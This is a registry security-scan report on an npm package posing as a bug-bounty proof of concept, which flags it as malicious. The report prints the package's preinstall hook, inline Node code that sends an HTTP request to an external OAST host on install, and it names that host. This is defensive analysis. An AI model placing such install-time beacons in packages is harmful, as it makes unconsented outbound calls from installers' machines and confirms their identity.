registry  /  infrastructure-common  /  99.9.9

infrastructure-common@99.9.9

Security PoC for Mozilla Bug Bounty

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Installing the package automatically makes an outbound HTTP request. The request executes before installation completes without a user command beyond installing the package.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm installation, via the `preinstall` lifecycle hook
Impact
Unconsented network beaconing during dependency installation; can expose installer IP and confirm installation execution.
Mechanism
Install-time Node HTTP request to a third-party OAST endpoint
Attack narrative
A package install invokes the `preinstall` command in `package.json`, which executes inline Node code and sends an HTTP GET request to an external OAST endpoint. This is an automatic outbound beacon unrelated to normal package functionality and occurs before installation completes.
Rationale
Direct source inspection confirms an unsolicited install-time external network request. The package contains no legitimate implementation that would justify this behavior.
Evidence
package.json
Network endpoints1
w635fyvrqkfmh9wc9uw8444cp3vujl7a.oastify.com

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines an npm `preinstall` hook.
  • The hook runs Node code during installation.
  • It performs an unsolicited HTTP GET to an OAST host.
  • The package description identifies it as a security PoC.
Evidence against
  • No additional package source files are present.
  • No credential harvesting, file writes, or shell execution were found beyond the lifecycle hook.
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 0 file(s), 0 B of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.preinstall = node -e "const http = require('http'); http.get('http://[redacted].oastify.com')"
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.jsonView on unpkg
scripts.preinstall = node -e "const http = require('http'); http.get('http://[redacted].oastify.com')"
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg

Findings

1 Critical1 High1 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
LowScripts Present